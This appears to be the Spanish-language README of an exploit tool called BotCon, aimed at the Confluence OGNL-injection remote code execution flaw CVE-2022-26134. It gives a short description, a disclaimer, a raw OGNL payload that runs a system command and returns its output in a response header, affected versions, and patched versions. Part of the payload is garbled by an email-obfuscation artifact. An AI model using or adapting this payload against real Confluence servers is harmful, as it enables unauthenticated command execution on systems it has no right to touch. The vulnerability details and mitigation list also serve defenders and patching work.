BotCon
Attlasian Confluence Ejecución Remota de Código No Autenticada mediante Inyección OGNL (CVE-2022-26134)
- El 02 de junio de 2022, Atlassian publicó un aviso de seguridad para sus aplicaciones Confluence Server y Data Center, destacando una vulnerabilidad de ejecución remota de código no autenticada de severidad crítica. La vulnerabilidad de inyección OGNL permite a un usuario no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center.
¡LEE ESTO!
Úsalo con precaución. Eres responsable de tus acciones.
Los desarrolladores no asumen ninguna responsabilidad y no se hacen responsables de ningún uso indebido o daño.

Payload Crudo
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Detalles del Fallo
-
Producto Afectado :
- Confluence
- Confluence Server
- Confluence Data Center
-
Versiones Afectadas :
- Todas las versiones soportadas de Confluence Server y Data Center están afectadas.
- Las versiones de Confluence Server y Data Center posteriores a 1.3.0 están afectadas.
Mitigaciones
- Actualiza tu versión de Attlasian Confluence a estas versiones corregidas :
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1